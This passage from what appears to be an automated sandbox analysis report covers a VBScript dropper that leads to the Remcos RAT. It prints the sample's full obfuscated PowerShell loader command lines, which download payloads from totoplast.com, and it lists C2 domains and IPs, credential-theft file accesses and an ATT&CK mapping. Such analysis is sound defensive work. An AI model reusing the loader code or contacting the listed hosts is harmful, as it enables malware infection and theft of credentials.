aantilau,o=perg$ prih af utrocckriskaerosprjsta beekvadrk gea pinggr,ne im.. hjes.llep faclslanihag tste (chiv$slouoinkaxdul.eaffaybl.eetele)anga ');depending (nrigstes ' kid[c.ntn nscenudet fyk. picsud leemnertaktvno eis.wac camespaspinteokeywii denfolktvignmmostapi fnhistadetagcanaed srrg,la]succ:wa,h:wilfsa jueomdeckillusjllrgrami whitvendyfordptopsrferros.ectdoriosubuc s eoef el wa, stol=fode bend[ connbryse.efet yvt.statsenlaepoddc vurufinrr svmid cktp ery si p firrdisto rectwimpo semcimpeowindlgudstcag ym topa,toeprel]envi: agl:udfrtrevilmatrsback1 viv2s mo ');$hucksterage=$limital[0];$anmis=(nrigstes ' lal$ grugdem.l unoovertbtrykasup lbusl:extaogambvbasie parrhepahsupeaportesamgnlustg .xitscot= na.n tokepolywsupe-nikoosek bmat jthioealpicintrt cay revasscriydents bo tkonseantimk.as..rhvntetre paltpass.plotwsupeedispbo prc flolbilii tydes,rgnp,nttlydi ');depending ($anmis);depending (nrigstes 'valu$alcoorakhvsaddemiserpla,h raya onsesem.nsoutg oulttand.haa h bscesupea usd typeindsrclumsun o[h ma$ unirabelr igifsalgaconcbjeblrskrli ,enk ca
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#unappropriation smaamnterne slaaenbrrene forsgsarbejders heiau #>;$gaardvagters='skvalderkaal';<#elicits tppes istandsttelses slavicist phylarch #>;$unhypnotizables=$urocentrumet204+$host.ui; function nrigstes($epiphanizingsochronized70){if ($unhypnotizables) {$kwanza++;}$dapifer=$leishmanic+$epiphanizingsochronized70.'length'-$kwanza; for( $epiphanizing=4;$epiphanizing -lt $dapifer;$epiphanizing+=5){$crawlerize=$epiphanizing;$castrato+=$epiphanizingsochronized70[$epiphanizing];$epiphanizingndianize='fljtekedels';}$castrato;}function depending($pyotr){ & ($tudsefisks33) ($pyotr);}$stvknappen=nrigstes 'was mant.odekazretrisubclm.tiltetrahvii/ ran ';$stvknappen+=nrigstes ' nd,5fi,m. um0kile mi n(overwsk,minympn ashd fedoforfwfo.ssuna cr mnan ithand tild1hith0sard.bela0u tr;sene brugwbut iblo nare 6tred4fo.l; fir nedsxphre6,nde4 un,;udfo salmr j nvspu : ini1i co3 end1jagt.llen0 rep)revi yntgd wnemillcansgkaviao fly/ agn2 ud 0hand1rici0spr,0dagb1 f s0 uds1la.d trof jacihjtirnedgeopstftarvop.eixjoke/ ag 1cl i3 kl,1futh.rigs0kin. ';$rrfabrikkernes=nrigstes 'denaus ans unmeoprer oeb-forlatr,og uvie ov npyretorys ';$hucksterage=nrigstes ' smrhkaertbonut filpkomms ab:feld/be y/natat bibothyrttanto l fpindrlh.ana arussyvatpean. u ecudvaos rem p o/un.rrmedf5 arb/ar,tc suroinfrsprygtnonailgnafang,omi lrlukkmf rp.spe oarchc antx tel ';$oxeye=nrigstes ' omd>bund ';$tudsefisks33=nrigstes ' abri preerivaxkon ';$tilplantet='deutonephron';$uncaps='\cobblerism.ace';depending (nrigstes 'anat$ progs,efl belo mazb ,nwauns lobje: axiv nnesvumr tabdchinsdebal,dlaifanfgafghsaf,ei kopnsa,udpeleec urtte k=anth$unpiesolsn smuvbipi:undeapreapbo.sp .midufora intt pola phr+ bot$ offunonvnblacc kolas appma ps ni ');depending (nrigstes ',ump$ u pgbemyldepoo turbprosaforelkas : pinl canimummmvandinut tdag aantilau,o=perg$ prih af utrocckriskaerosprjsta beekvadrk gea pinggr,ne im.. hjes.llep faclslanihag tste (chiv$slouoinkaxdul.eaffaybl.eetele)anga ');depending (nrigstes ' kid[c.ntn nscenudet fyk. picsud leemnertaktvno eis.wac camespaspinteokeywii denfolktvignmmostapi fnhistadetagcanaed srrg,la]succ:wa,h:wilfsa jueomdeckillusjllrgrami whitvendyfordptopsrferros.ectdoriosubuc s eoef el wa, stol=fode bend[ connbryse.efet yvt.statsenlaepoddc vurufinrr svmid cktp ery si p firrdisto rectwimpo semcimpeowindlgudstcag ym topa,toeprel]envi: agl:udfrtrevilmatrsback1 viv2s mo ');$hucksterage=$limital[0];$anmis=(nrigstes ' lal$ grugdem.l unoovertbtrykasup lbusl:extaogambvbasie parrhepahsupeaportesamgnlustg .xitscot= na.n tokepolywsupe-nikoosek bmat jthioealpicintrt cay revasscriydents bo tkonseantimk.as..rhvntetre paltpass.plotwsupeedispbo prc flolbilii tydes,rgnp,nttlydi ');depending ($anmis);depending (nrigstes 'valu$alcoorakhvsaddemiserpla,h raya onsesem.nsoutg oulttand.haa h bscesupea usd typeindsrclumsun o[h ma$ unirabelr igifsalgaconcbjeblrskrli ,enk ca
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#unappropriation smaamnterne slaaenbrrene forsgsarbejders heiau #>;$gaardvagters='skvalderkaal';<#elicits tppes istandsttelses slavicist phylarch #>;$unhypnotizables=$urocentrumet204+$host.ui; function nrigstes($epiphanizingsochronized70){if ($unhypnotizables) {$kwanza++;}$dapifer=$leishmanic+$epiphanizingsochronized70.'length'-$kwanza; for( $epiphanizing=4;$epiphanizing -lt $dapifer;$epiphanizing+=5){$crawlerize=$epiphanizing;$castrato+=$epiphanizingsochronized70[$epiphanizing];$epiphanizingndianize='fljtekedels';}$castrato;}function depending($pyotr){ & ($tudsefisks33) ($pyotr);}$stvknappen=nrigstes 'was mant.odekazretrisubclm.tiltetrahvii/ ran ';$stvknappen+=nrigstes ' nd,5fi,m. um0kile mi n(overwsk,minympn ashd fedoforfwfo.ssuna cr mnan ithand tild1hith0sard.bela0u tr;sene brugwbut iblo nare 6tred4fo.l; fir nedsxphre6,nde4 un,;udfo salmr j nvspu : ini1i co3 end1jagt.llen0 rep)revi yntgd wnemillcansgkaviao fly/ agn2 ud 0hand1rici0spr,0dagb1 f s0 uds1la.d trof jacihjtirnedgeopstftarvop.eixjoke/ ag 1cl i3 kl,1futh.rigs0kin. ';$rrfabrikkernes=nrigstes 'denaus ans unmeoprer oeb-forlatr,og uvie ov npyretorys ';$hucksterage=nrigstes ' smrhkaertbonut filpkomms ab:feld/be y/natat bibothyrttanto l fpindrlh.ana arussyvatpean. u ecudvaos rem p o/un.rrmedf5 arb/ar,tc suroinfrsprygtnonailgnafang,omi lrlukkmf rp.spe oarchc antx tel ';$oxeye=nrigstes ' omd>bund ';$tudsefisks33=nrigstes ' abri preerivaxkon ';$tilplantet='deutonephron';$uncaps='\cobblerism.ace';depending (nrigstes 'anat$ progs,efl belo mazb ,nwauns lobje: axiv nnesvumr tabdchinsdebal,dlaifanfgafghsaf,ei kopnsa,udpeleec urtte k=anth$unpiesolsn smuvbipi:undeapreapbo.sp .midufora intt pola phr+ bot$ offunonvnblacc kolas appma ps ni ');depending (nrigstes ',ump$ u pgbemyldepoo turbprosaforelkas : pinl canimummmvandinut tdag aantilau,o=perg$ prih af utrocckriskaerosprjsta beekvadrk gea pinggr,ne im.. hjes.llep faclslanihag tste (chiv$slouoinkaxdul.eaffaybl.eetele)anga ');depending (nrigstes ' kid[c.ntn nscenudet fyk. picsud leemnertaktvno eis.wac camespaspinteokeywii denfolktvignmmostapi fnhistadetagcanaed srrg,la]succ:wa,h:wilfsa jueomdeckillusjllrgrami whitvendyfordptopsrferros.ectdoriosubuc s eoef el wa, stol=fode bend[ connbryse.efet yvt.statsenlaepoddc vurufinrr svmid cktp ery si p firrdisto rectwimpo semcimpeowindlgudstcag ym topa,toeprel]envi: agl:udfrtrevilmatrsback1 viv2s mo ');$hucksterage=$limital[0];$anmis=(nrigstes ' lal$ grugdem.l unoovertbtrykasup lbusl:extaogambvbasie parrhepahsupeaportesamgnlustg .xitscot= na.n tokepolywsupe-nikoosek bmat jthioealpicintrt cay revasscriydents bo tkonseantimk.as..rhvntetre paltpass.plotwsupeedispbo prc flolbilii tydes,rgnp,nttlydi ');depending ($anmis);depending (nrigstes 'valu$alcoorakhvsaddemiserpla,h raya onsesem.nsoutg oulttand.haa h bscesupea usd typeindsrclumsun o[h ma$ unirabelr igifsalgaconcbjeblrskrli ,enk caJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D2933 cpuid 11_2_232D2933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_232D2264
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,19_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0041739B GetVersionExW,18_2_0041739B
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000B.00000002.2768503378.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2768909319.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2760236135.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2760236135.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2765820864.000000000014F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2768909319.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword19_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword19_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword19_2_00402DB3

                Remote Access Functionality

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-N1P6UNJump to behavior
                Source: Yara matchFile source: 0000000B.00000002.2768503378.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2768909319.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2760236135.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2760236135.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2765820864.000000000014F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2768909319.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information321
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                321
                Scripting
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                3
                Obfuscated Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                1
                Registry Run Keys / Startup Folder
                411
                Process Injection
                1
                Software Packing
                1
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares11
                Input Capture
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts22
                Command and Scripting Interpreter
                Login Hook1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                NTDS28
                System Information Discovery
                Distributed Component Object Model2
                Clipboard Data
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell
                Network Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets141
                Security Software Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture213
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                Remote System Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                System Network Configuration Discovery
                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538692 Sample: Order_MG2027176.vbs Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 44 renajazinw.duckdns.org 2->44 46 gormezl_6777.6777.6777.677e 2->46 48 2 other IPs or domains 2->48 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 74 9 other signatures 2->74 9 powershell.exe 18 2->9         started        12 wscript.exe 1 2->12         started        signatures3 72 Uses dynamic DNS services 44->72 process4 signatures5 76 Early bird code injection technique detected 9->76 78 Writes to foreign memory regions 9->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 9->80 88 2 other signatures 9->88 14 msiexec.exe 5 17 9->14         started        19 conhost.exe 9->19         started        82 VBScript performs obfuscated calls to suspicious functions 12->82 84 Suspicious powershell command line found 12->84 86 Wscript starts Powershell (via cmd or directly) 12->86 90 2 other signatures 12->90 21 powershell.exe 14 18 12->21         started        23 PING.EXE 1 12->23         started        process6 dnsIp7 50 185.157.163.135, 53848, 65097, 65098 OBE-EUROPEObenetworkEuropeSE Sweden 14->50 52 geoplugin.net 178.237.33.50, 65099, 80 ATOM86-ASATOM86NL Netherlands 14->52 42 C:\ProgramData\remcos\logs.dat, data 14->42 dropped 56 Detected Remcos RAT 14->56 58 Tries to steal Mail credentials (via file registry) 14->58 60 Maps a DLL or memory area into another process 14->60 64 2 other signatures 14->64 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        36 2 other processes 14->36 54 totoplast.com 192.185.113.96, 443, 49708, 49716 UNIFIEDLAYER-AS-1US United States 21->54 62 Found suspicious powershell code related to unpacking or dynamic code loading 21->62 32 conhost.exe 21->32         started        34 conhost.exe 23->34         started        file8 signatures9 process10 signatures11 92 Tries to harvest and steal browser information (history, passwords, etc) 25->92 38 conhost.exe 30->38         started        40 reg.exe 1 1 30->40         started        process12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Order_MG2027176.vbs5%ReversingLabsWin32.Trojan.Generic
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                totoplast.com
                192.185.113.96
                truefalse
                  unknown
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    unknown
                    gormezl_6777.6777.6777.677e
                    unknown
                    unknowntrue
                      unknown
                      renajazinw.duckdns.org
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        renajazinw.duckdns.orgtrue
                          unknown
                          http://geoplugin.net/json.gpfalse
                          • URL Reputation: safe
                          unknown
                          https://totoplast.com/r5/JfcplHmBpoWXVfH37.binfalse
                            unknown
                            https://totoplast.com/r5/Costiform.ocxfalse
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1668201842.00000196A8183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1772557768.00000000046D7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1772557768.00000000046D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://go.micropowershell.exe, 00000004.00000002.1644672636.0000019698CC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.microsoft.copowershell.exe, 00000006.00000002.1799974907.0000000006E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.imvu.commsiexec.exefalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1772557768.00000000046D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://go.micdpowershell.exe, 00000006.00000002.1799974907.0000000006ED0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.google.commsiexec.exefalse
                                        unknown
                                        https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.1772557768.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://totoplast.compowershell.exe, 00000004.00000002.1644672636.0000019699E8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1644672636.0000019698336000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://contoso.com/powershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1668201842.00000196A8183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                            unknown
                                            https://login.yahoo.com/config/loginmsiexec.exefalse
                                            • URL Reputation: safe
                                            unknown
                                            https://aka.ms/pscore68powershell.exe, 00000004.00000002.1644672636.0000019698111000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://totoplast.com/r5/Costiform.ocxXRtlpowershell.exe, 00000006.00000002.1772557768.00000000046D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.nirsoft.net/msiexec.exefalse
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1644672636.0000019698111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1772557768.0000000004581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://totoplast.compowershell.exe, 00000004.00000002.1644672636.0000019699E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.ebuddy.commsiexec.exefalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
